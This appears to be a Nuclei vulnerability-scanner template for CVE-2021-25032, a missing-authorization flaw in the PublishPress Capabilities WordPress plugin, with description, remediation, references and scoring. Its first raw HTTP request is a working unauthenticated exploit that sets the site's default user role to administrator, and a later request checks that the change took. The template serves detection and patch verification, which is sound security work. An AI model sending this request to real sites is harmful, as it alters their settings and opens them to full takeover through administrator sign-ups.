id: CVE-2021-25032

info:
  name: PublishPress Capabilities < 2.3.1 - Missing Authorization
  author: ritikchaddha
  severity: critical
  description: |
    The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options, including setting the default user role to administrator, leading to complete site compromise through privilege escalation.
  remediation: |
    Update the PublishPress Capabilities plugin to version 2.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/2f0f1a32-0c7a-48e6-8617-e0b2dcf62727/
    - https://plugins.trac.wordpress.org/changeset/2640161
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25032
    - https://github.com/RandomRobbieBF/CVE-2021-25032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-25032
    cwe-id: CWE-352
    epss-score: 0.81889
    epss-percentile: 0.99227
    cpe: cpe:2.3:a:publishpress:capabilities:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: publishpress
    product: capabilities
    framework: wordpress
    fofa-query: body="/wp-content/plugins/capability-manager-enhanced"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        page=pp-capabilities-settings&all_options=default_role&default_role=administrator

      - |
        POST /wp-login.php?redirect_to=http%3A%2F%2F{{Hostname}}%2Fwp-admin%2Foptions-general.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=pp-capabilities HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "selected'> Administrator"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220179d0dd8a710a5646a400574184c65750af780895fe4a4000f7baad7c6fc7cb2022100969baf8c2ace94d11951aa3e84511472e9809869483dd358d0fde03ac002a471:922c64590222798bb761d5b6d8e72950